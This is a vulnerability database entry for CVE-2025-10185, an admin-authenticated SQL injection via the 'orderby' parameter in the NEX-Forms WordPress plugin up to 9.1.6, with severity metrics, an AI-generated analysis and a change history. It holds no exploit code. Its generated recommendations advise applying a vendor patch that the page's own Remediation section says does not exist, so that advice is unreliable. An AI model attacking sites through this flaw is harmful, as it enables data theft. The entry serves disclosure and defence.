Description
The NEX-Forms – Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in the action nf_load_form_entries in all versions up to, and including, 9.1.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This may be exploitable by lower-level users if access is granted by a site administrator.
Published: 2025-10-11
Score: 4.9 Medium
EPSS: < 1% Very Low
KEV: No
Impact: SQL Injection
Action: Patch
AI Analysis

Impact

The NEX-Forms – Ultimate Forms Plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in the nf_load_form_entries action. This lack of proper escaping allows an attacker who is authenticated with administrator-level privileges to append arbitrary SQL statements to the existing query. The vulnerability is a classic SQL Injection flaw, identified as CWE‑89, and can be used to exfiltrate sensitive data from the database.

Affected Systems

The flaw impacts the Webaways NEX‑Forms – Ultimate Forms Plugin for WordPress versions 9.1.6 and earlier (including 9.1.6). Users who have installed or run these affected releases are at risk if they have administrator or higher-level accounts on the site.

Risk and Exploitability

With a CVSS score of 4.9 the vulnerability is of moderate severity, and its EPSS score of less than 1 % indicates a very low probability of exploitation in the wild. The flaw is not listed in the CISA KEV catalog. Exploitation requires authenticated access, typically an administrator or privileged user; a site manager could grant lower‑level users the necessary permissions, widening the attack surface. Consequently, while the impact could be significant for an attacker able to log in, the likelihood of exploitation remains comparatively low.

Generated by OpenCVE AI on April 21, 2026 at 02:25 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the NEX‑Forms plugin to a version newer than 9.1.6, which removes the vulnerable 'orderby' handling.
  • Restrict administrator privileges to only trusted personnel and review role assignments to prevent accidental elevation of lower‑level users.
  • Apply the vendor’s security patch and consider implementing additional application layer defenses such as web application firewalls that block malformed query parameters.

Generated by OpenCVE AI on April 21, 2026 at 02:25 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 21 Oct 2025 13:15:00 +0000

Type Values Removed Values Added
First Time appeared Webaways
Webaways nex-forms-ultimate-forms-plugin
Wordpress
Wordpress wordpress
Vendors & Products Webaways
Webaways nex-forms-ultimate-forms-plugin
Wordpress
Wordpress wordpress

Tue, 14 Oct 2025 15:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Sat, 11 Oct 2025 07:30:00 +0000

Type Values Removed Values Added
Description The NEX-Forms – Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in the action nf_load_form_entries in all versions up to, and including, 9.1.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This may be exploitable by lower-level users if access is granted by a site administrator.
Title NEX-Forms – Ultimate Forms Plugin for WordPress <= 9.1.6 - Authenticated (Admin+) SQL Injection
Weaknesses CWE-89
References
Metrics cvssV3_1

{'score': 4.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}

Subscriptions

Webaways Nex-forms-ultimate-forms-plugin
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T17:30:13.145Z

Reserved: 2025-09-09T15:11:39.813Z

Link: CVE-2025-10185

cve-icon Vulnrichment

Updated: 2025-10-14T13:31:06.349Z

cve-icon NVD

Status : Deferred

Published: 2025-10-11T08:15:31.790

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-10185

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-21T02:30:25Z

Weaknesses